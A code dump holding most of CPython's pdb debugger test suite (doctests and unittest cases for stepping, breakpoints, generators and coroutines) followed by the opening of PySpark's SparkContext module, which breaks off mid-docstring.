(Pdb) down
> <doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function_2():
2 try:
3 >> 1/0
4 finally:
5 -> print('Exception!')
[EOF]
(Pdb) continue
Correctly reraised.
"""
def test_pdb_skip_modules():
"""This illustrates the simple case of module skipping.
>>> def skip_module():
... import string
... import pdb; pdb.Pdb(skip=['stri*'], nosigint=True, readrc=False).set_trace()
... string.capwords('FOO')
>>> with PdbTestInput([
... 'step',
... 'continue',
... ]):
... skip_module()
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()
-> string.capwords('FOO')
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()->None
-> string.capwords('FOO')
(Pdb) continue
"""
# Module for testing skipping of module that makes a callback
mod = types.ModuleType('module_to_skip')
exec('def foo_pony(callback): x = 1; callback(); return None', mod.__dict__)
def test_pdb_skip_modules_with_callback():
"""This illustrates skipping of modules that call into other code.
>>> def skip_module():
... def callback():
... return None
... import pdb; pdb.Pdb(skip=['module_to_skip*'], nosigint=True, readrc=False).set_trace()
... mod.foo_pony(callback)
>>> with PdbTestInput([
... 'step',
... 'step',
... 'step',
... 'step',
... 'step',
... 'continue',
... ]):
... skip_module()
... pass # provides something to "step" to
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()
-> mod.foo_pony(callback)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(2)callback()
-> def callback():
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()->None
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()->None
-> mod.foo_pony(callback)
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[1]>(10)<module>()
-> pass # provides something to "step" to
(Pdb) continue
"""
def test_pdb_continue_in_bottomframe():
"""Test that "continue" and "next" work properly in bottom frame (issue #5294).
>>> def test_function():
... import pdb, sys; inst = pdb.Pdb(nosigint=True, readrc=False)
... inst.set_trace()
... inst.botframe = sys._getframe() # hackery to get the right botframe
... print(1)
... print(2)
... print(3)
... print(4)
>>> with PdbTestInput([ # doctest: +ELLIPSIS
... 'next',
... 'break 7',
... 'continue',
... 'next',
... 'continue',
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(4)test_function()
-> inst.botframe = sys._getframe() # hackery to get the right botframe
(Pdb) next
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(5)test_function()
-> print(1)
(Pdb) break 7
Breakpoint ... at <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>:7
(Pdb) continue
1
2
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(7)test_function()
-> print(3)
(Pdb) next
3
> <doctest test.test_pdb.test_pdb_continue_in_bottomframe[0]>(8)test_function()
-> print(4)
(Pdb) continue
4
"""
def pdb_invoke(method, arg):
"""Run pdb.method(arg)."""
getattr(pdb.Pdb(nosigint=True, readrc=False), method)(arg)
def test_pdb_run_with_incorrect_argument():
"""Testing run and runeval with incorrect first argument.
>>> pti = PdbTestInput(['continue',])
>>> with pti:
... pdb_invoke('run', lambda x: x)
Traceback (most recent call last):
TypeError: exec() arg 1 must be a string, bytes or code object
>>> with pti:
... pdb_invoke('runeval', lambda x: x)
Traceback (most recent call last):
TypeError: eval() arg 1 must be a string, bytes or code object
"""
def test_pdb_run_with_code_object():
"""Testing run and runeval with code object as a first argument.
>>> with PdbTestInput(['step','x', 'continue']): # doctest: +ELLIPSIS
... pdb_invoke('run', compile('x=1', '<string>', 'exec'))
> <string>(1)<module>()...
(Pdb) step
--Return--
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
>>> with PdbTestInput(['x', 'continue']):
... x=0
... pdb_invoke('runeval', compile('x+1', '<string>', 'eval'))
> <string>(1)<module>()->None
(Pdb) x
1
(Pdb) continue
"""
def test_next_until_return_at_return_event():
"""Test that pdb stops after a next/until/return issued at a return debug event.
>>> def test_function_2():
... x = 1
... x = 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... test_function_2()
... test_function_2()
... end = 1
>>> from bdb import Breakpoint
>>> Breakpoint.next = 1
>>> with PdbTestInput(['break test_function_2',
... 'continue',
... 'return',
... 'next',
... 'continue',
... 'return',
... 'until',
... 'continue',
... 'return',
... 'return',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(3)test_function()
-> test_function_2()
(Pdb) break test_function_2
Breakpoint 1 at <doctest test.test_pdb.test_next_until_return_at_return_event[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) next
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(4)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) until
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(5)test_function()
-> test_function_2()
(Pdb) continue
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(2)test_function_2()
-> x = 1
(Pdb) return
--Return--
> <doctest test.test_pdb.test_next_until_return_at_return_event[0]>(3)test_function_2()->None
-> x = 2
(Pdb) return
> <doctest test.test_pdb.test_next_until_return_at_return_event[1]>(6)test_function()
-> end = 1
(Pdb) continue
"""
def test_pdb_next_command_for_generator():
"""Testing skip unwindng stack on yield for generators for "next" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(2)test_gen()
-> yield 0
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()
-> return 1
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_generator[0]>(3)test_gen()->1
-> return 1
(Pdb) step
StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) continue
finished
"""
def test_pdb_next_command_for_coroutine():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[1]>(4)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
Internal StopIteration
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_next_command_for_coroutine[2]>(3)test_main()->None
-> await test_coro()
(Pdb) continue
finished
"""
def test_pdb_next_command_for_asyncgen():
"""Testing skip unwindng stack on yield for coroutines for "next" command
>>> import asyncio
>>> async def agen():
... yield 1
... await asyncio.sleep(0)
... yield 2
>>> async def test_coro():
... async for x in agen():
... print(x)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[3]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(3)test_coro()
-> print(x)
(Pdb) next
1
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[2]>(2)test_coro()
-> async for x in agen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(2)agen()
-> yield 1
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_for_asyncgen[1]>(3)agen()
-> await asyncio.sleep(0)
(Pdb) continue
2
finished
"""
def test_pdb_return_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "return" command
>>> def test_gen():
... yield 0
... return 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... it = test_gen()
... try:
... if next(it) != 0:
... raise AssertionError
... next(it)
... except StopIteration as ex:
... if ex.value != 1:
... raise AssertionError
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'step',
... 'return',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(3)test_function()
-> it = test_gen()
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(4)test_function()
-> try:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(5)test_function()
-> if next(it) != 0:
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) return
StopIteration: 1
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(7)test_function()
-> next(it)
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(8)test_function()
-> except StopIteration as ex:
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_generator[1]>(9)test_function()
-> if ex.value != 1:
(Pdb) continue
finished
"""
def test_pdb_return_command_for_coroutine():
"""Testing no unwindng stack on yield for coroutines for "return" command
>>> import asyncio
>>> async def test_coro():
... await asyncio.sleep(0)
... await asyncio.sleep(0)
... await asyncio.sleep(0)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) step
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(2)test_coro()
-> await asyncio.sleep(0)
(Pdb) next
> <doctest test.test_pdb.test_pdb_return_command_for_coroutine[1]>(3)test_coro()
-> await asyncio.sleep(0)
(Pdb) continue
finished
"""
def test_pdb_until_command_for_generator():
"""Testing no unwindng stack on yield for generators
for "until" command if target breakpoint is not reached
>>> def test_gen():
... yield 0
... yield 1
... yield 2
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print(i)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 4',
... 'step',
... 'step',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(1)test_gen()
-> def test_gen():
(Pdb) until 4
0
1
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()
-> yield 2
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_until_command_for_generator[0]>(4)test_gen()->2
-> yield 2
(Pdb) step
> <doctest test.test_pdb.test_pdb_until_command_for_generator[1]>(4)test_function()
-> print(i)
(Pdb) continue
2
finished
"""
def test_pdb_until_command_for_coroutine():
"""Testing no unwindng stack for coroutines
for "until" command if target breakpoint is not reached
>>> import asyncio
>>> async def test_coro():
... print(0)
... await asyncio.sleep(0)
... print(1)
... await asyncio.sleep(0)
... print(2)
... await asyncio.sleep(0)
... print(3)
>>> async def test_main():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... await test_coro()
>>> def test_function():
... loop = asyncio.new_event_loop()
... loop.run_until_complete(test_main())
... loop.close()
... asyncio.set_event_loop_policy(None)
... print("finished")
>>> with PdbTestInput(['step',
... 'until 8',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[2]>(3)test_main()
-> await test_coro()
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(1)test_coro()
-> async def test_coro():
(Pdb) until 8
0
1
2
> <doctest test.test_pdb.test_pdb_until_command_for_coroutine[1]>(8)test_coro()
-> print(3)
(Pdb) continue
3
finished
"""
def test_pdb_next_command_in_generator_for_loop():
"""The next command on returning from a generator controlled by a for loop.
>>> def test_gen():
... yield 0
... return 1
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['break test_gen',
... 'continue',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) break test_gen
Breakpoint 6 at <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>:1
(Pdb) continue
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(2)test_gen()
-> yield 0
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[0]>(3)test_gen()
-> return 1
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_in_generator_for_loop[1]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_next_command_subiterator():
"""The next command in a generator with a subiterator.
>>> def test_subgenerator():
... yield 0
... return 1
>>> def test_gen():
... x = yield from test_subgenerator()
... return x
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... for i in test_gen():
... print('value', i)
... x = 123
>>> with PdbTestInput(['step',
... 'step',
... 'next',
... 'next',
... 'next',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(1)test_gen()
-> def test_gen():
(Pdb) step
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(2)test_gen()
-> x = yield from test_subgenerator()
(Pdb) next
value 0
> <doctest test.test_pdb.test_pdb_next_command_subiterator[1]>(3)test_gen()
-> return x
(Pdb) next
Internal StopIteration: 1
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(3)test_function()
-> for i in test_gen():
(Pdb) next
> <doctest test.test_pdb.test_pdb_next_command_subiterator[2]>(5)test_function()
-> x = 123
(Pdb) continue
"""
def test_pdb_issue_20766():
"""Test for reference leaks when the SIGINT handler is set.
>>> def test_function():
... i = 1
... while i <= 2:
... sess = pdb.Pdb()
... sess.set_trace(sys._getframe())
... print('pdb %d: %s' % (i, sess._previous_sigint_handler))
... i += 1
>>> with PdbTestInput(['continue',
... 'continue']):
... test_function()
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(6)test_function()
-> print('pdb %d: %s' % (i, sess._previous_sigint_handler))
(Pdb) continue
pdb 1: <built-in function default_int_handler>
> <doctest test.test_pdb.test_pdb_issue_20766[0]>(5)test_function()
-> sess.set_trace(sys._getframe())
(Pdb) continue
pdb 2: <built-in function default_int_handler>
"""
class PdbTestCase(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def _run_pdb(self, pdb_args, commands):
self.addCleanup(support.rmtree, '__pycache__')
cmd = [sys.executable, '-m', 'pdb'] + pdb_args
with subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
) as proc:
stdout, stderr = proc.communicate(str.encode(commands))
stdout = stdout and bytes.decode(stdout)
stderr = stderr and bytes.decode(stderr)
return stdout, stderr
def run_pdb_script(self, script, commands):
"""Run 'script' lines with pdb and the pdb 'commands'."""
filename = 'main.py'
with open(filename, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(support.unlink, filename)
return self._run_pdb([filename], commands)
def run_pdb_module(self, script, commands):
"""Runs the script code as part of a module"""
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
pass
with open(main_file, 'w') as f:
f.write(textwrap.dedent(script))
self.addCleanup(support.rmtree, self.module_name)
return self._run_pdb(['-m', self.module_name], commands)
def _assert_find_function(self, file_content, func_name, expected):
file_content = textwrap.dedent(file_content)
with open(support.TESTFN, 'w') as f:
f.write(file_content)
expected = None if not expected else (
expected[0], support.TESTFN, expected[1])
self.assertEqual(
expected, pdb.find_function(func_name, support.TESTFN))
def test_find_function_empty_file(self):
self._assert_find_function('', 'foo', None)
def test_find_function_found(self):
self._assert_find_function(
"""\
def foo():
pass
def bar():
pass
def quux():
pass
""",
'bar',
('bar', 4),
)
def test_issue7964(self):
# open the file as binary so we can force \r\n newline
with open(support.TESTFN, 'wb') as f:
f.write(b'print("testing my pdb")\r\n')
cmd = [sys.executable, '-m', 'pdb', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'quit\n')
self.assertNotIn(b'SyntaxError', stdout,
"Got a syntax error running test script under PDB")
def test_issue13183(self):
script = """
from bar import bar
def foo():
bar()
def nope():
pass
def foobar():
foo()
nope()
foobar()
"""
commands = """
from bar import bar
break bar
continue
step
step
quit
"""
bar = """
def bar():
pass
"""
with open('bar.py', 'w') as f:
f.write(textwrap.dedent(bar))
self.addCleanup(support.unlink, 'bar.py')
stdout, stderr = self.run_pdb_script(script, commands)
self.assertTrue(
any('main.py(5)foo()->None' in l for l in stdout.splitlines()),
'Fail to step into the caller after a return')
def test_issue13120(self):
# Invoking "continue" on a non-main thread triggered an exception
# inside signal.signal.
with open(support.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
def start_pdb():
pdb.Pdb(readrc=False).set_trace()
x = 1
y = 1
t = threading.Thread(target=start_pdb)
t.start()""").encode('ascii'))
cmd = [sys.executable, '-u', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\n')
self.assertNotIn('Error', stdout.decode(),
"Got an error running test script under PDB")
def test_issue36250(self):
with open(support.TESTFN, 'wb') as f:
f.write(textwrap.dedent("""
import threading
import pdb
evt = threading.Event()
def start_pdb():
evt.wait()
pdb.Pdb(readrc=False).set_trace()
t = threading.Thread(target=start_pdb)
t.start()
pdb.Pdb(readrc=False).set_trace()
evt.set()
t.join()""").encode('ascii'))
cmd = [sys.executable, '-u', support.TESTFN]
proc = subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
self.addCleanup(proc.stdout.close)
stdout, stderr = proc.communicate(b'cont\ncont\n')
self.assertNotIn('Error', stdout.decode(),
"Got an error running test script under PDB")
def test_issue16180(self):
# A syntax error in the debuggee.
script = "def f: pass\n"
commands = ''
expected = "SyntaxError:"
stdout, stderr = self.run_pdb_script(script, commands)
self.assertIn(expected, stdout,
'\n\nExpected:\n{}\nGot:\n{}\n'
'Fail to handle a syntax error in the debuggee.'
.format(expected, stdout))
def test_readrc_kwarg(self):
script = textwrap.dedent("""
import pdb; pdb.Pdb(readrc=False).set_trace()
print('hello')
""")
save_home = os.environ.pop('HOME', None)
try:
with support.temp_cwd():
with open('.pdbrc', 'w') as f:
f.write("invalid\n")
with open('main.py', 'w') as f:
f.write(script)
cmd = [sys.executable, 'main.py']
proc = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
)
with proc:
stdout, stderr = proc.communicate(b'q\n')
self.assertNotIn("NameError: name 'invalid' is not defined",
stdout.decode())
finally:
if save_home is not None:
os.environ['HOME'] = save_home
def test_readrc_homedir(self):
save_home = os.environ.pop("HOME", None)
with support.temp_dir() as temp_dir, patch("os.path.expanduser"):
rc_path = os.path.join(temp_dir, ".pdbrc")
os.path.expanduser.return_value = rc_path
try:
with open(rc_path, "w") as f:
f.write("invalid")
self.assertEqual(pdb.Pdb().rcLines[0], "invalid")
finally:
if save_home is not None:
os.environ["HOME"] = save_home
def test_header(self):
stdout = StringIO()
header = 'Nobody expects... blah, blah, blah'
with ExitStack() as resources:
resources.enter_context(patch('sys.stdout', stdout))
resources.enter_context(patch.object(pdb.Pdb, 'set_trace'))
pdb.set_trace(header=header)
self.assertEqual(stdout.getvalue(), header + '\n')
def test_run_module(self):
script = """print("SUCCESS")"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_module_is_run_as_main(self):
script = """
if __name__ == '__main__':
print("SUCCESS")
"""
commands = """
continue
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("SUCCESS" in l for l in stdout.splitlines()), stdout)
def test_breakpoint(self):
script = """
if __name__ == '__main__':
pass
print("SUCCESS")
pass
"""
commands = """
b 3
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("Breakpoint 1 at" in l for l in stdout.splitlines()), stdout)
self.assertTrue(all("SUCCESS" not in l for l in stdout.splitlines()), stdout)
def test_run_pdb_with_pdb(self):
commands = """
c
quit
"""
stdout, stderr = self._run_pdb(["-m", "pdb"], commands)
self.assertIn(
pdb._usage,
stdout.replace('\r', '') # remove \r for windows
)
def test_module_without_a_main(self):
module_name = 't_main'
support.rmtree(module_name)
init_file = module_name + '/__init__.py'
os.mkdir(module_name)
with open(init_file, 'w') as f:
pass
self.addCleanup(support.rmtree, module_name)
stdout, stderr = self._run_pdb(['-m', module_name], "")
self.assertIn("ImportError: No module named t_main.__main__",
stdout.splitlines())
def test_blocks_at_first_code_line(self):
script = """
#This is a comment, on line 2
print("SUCCESS")
"""
commands = """
quit
"""
stdout, stderr = self.run_pdb_module(script, commands)
self.assertTrue(any("__main__.py(4)<module>()"
in l for l in stdout.splitlines()), stdout)
def test_relative_imports(self):
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/__main__.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(support.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import top_var
from .module import var
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
var2 = "second var"
"""))
commands = """
b 5
c
p top_var
p var
p module.var2
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
self.assertTrue(any("VAR from top" in l for l in stdout.splitlines()))
self.assertTrue(any("second var" in l for l in stdout.splitlines()))
def test_relative_imports_on_plain_module(self):
# Validates running a plain module. See bpo32691
self.module_name = 't_main'
support.rmtree(self.module_name)
main_file = self.module_name + '/runme.py'
init_file = self.module_name + '/__init__.py'
module_file = self.module_name + '/module.py'
self.addCleanup(support.rmtree, self.module_name)
os.mkdir(self.module_name)
with open(init_file, 'w') as f:
f.write(textwrap.dedent("""
top_var = "VAR from top"
"""))
with open(main_file, 'w') as f:
f.write(textwrap.dedent("""
from . import module
pass # We'll stop here and print the vars
"""))
with open(module_file, 'w') as f:
f.write(textwrap.dedent("""
var = "VAR from module"
"""))
commands = """
b 3
c
p module.var
quit
"""
stdout, _ = self._run_pdb(['-m', self.module_name + '.runme'], commands)
self.assertTrue(any("VAR from module" in l for l in stdout.splitlines()), stdout)
def test_errors_in_command(self):
commands = "\n".join([
'print(',
'debug print(',
'debug doesnotexist',
'c',
])
stdout, _ = self.run_pdb_script('', commands + '\n')
self.assertEqual(stdout.splitlines()[1:], [
'(Pdb) *** SyntaxError: unexpected EOF while parsing',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'*** SyntaxError: unexpected EOF while parsing',
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ENTERING RECURSIVE DEBUGGER',
'> <string>(1)<module>()',
"((Pdb)) *** NameError: name 'doesnotexist' is not defined",
'LEAVING RECURSIVE DEBUGGER',
'(Pdb) ',
])
def load_tests(*args):
from test import test_pdb
suites = [
unittest.makeSuite(PdbTestCase),
doctest.DocTestSuite(test_pdb)
]
return unittest.TestSuite(suites)
if __name__ == '__main__':
unittest.main()
|
context.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import os
import shutil
import signal
import sys
import threading
import warnings
from threading import RLock
from tempfile import NamedTemporaryFile
from py4j.protocol import Py4JError
from pyspark import accumulators
from pyspark.accumulators import Accumulator
from pyspark.broadcast import Broadcast, BroadcastPickleRegistry
from pyspark.conf import SparkConf
from pyspark.files import SparkFiles
from pyspark.java_gateway import launch_gateway
from pyspark.serializers import PickleSerializer, BatchedSerializer, UTF8Deserializer, \
PairDeserializer, AutoBatchedSerializer, NoOpSerializer
from pyspark.storagelevel import StorageLevel
from pyspark.rdd import RDD, _load_from_socket, ignore_unicode_prefix
from pyspark.traceback_utils import CallSite, first_spark_call
from pyspark.status import StatusTracker
from pyspark.profiler import ProfilerCollector, BasicProfiler
if sys.version > '3':
xrange = range
__all__ = ['SparkContext']
# These are special default configs for PySpark, they will overwrite
# the default ones for Spark if they are not configured by user.
DEFAULT_CONFIGS = {
"spark.serializer.objectStreamReset": 100,
"spark.rdd.compress": True,
}
class SparkContext(object):
"""
Main entry point for Spark functionality. A SparkContext represents the
connection to a Spark cluster, and can be used to create L{RDD} and
broadcast variables on that cluster.
"""
_gateway = None
_jvm = None
_next_accum_id = 0
_active_spark_context = None
_lock = RLock()
_python_includes = None # zip and egg files that need to be added to PYTHONPATH
PACKAGE_EXTENSIONS = ('.zip', '.egg', '.jar')
def __init__(self, master=None, appName=None, sparkHome=None, pyFiles=None,
environment=None, batchSize=0, serializer=PickleSerializer(), conf=None,
gateway=None, jsc=None, profiler_cls=BasicProfiler):
"""
Create a new SparkContext. At least the master and app name should be set,
either through the named parameters here or through C{conf}.
:param master: Cluster URL to connect to
(e.g. mesos://host:port, spark://host:port, local[4]).
:param appName: A name for your job, to display on the cluster web UI.
:param sparkHome: Location where Spark is installed on cluster nodes.
:param pyFiles: Collection of .zip or .py files to send to the cluster
and add to PYTHONPATH. These can be paths on the local file
system or HDFS, HTTP, HTTPS, or FTP URLs.
:param environment: A dictionary of environment variables to set on
worker nodes.
:param batchSize: The number of Python objects represented as a single
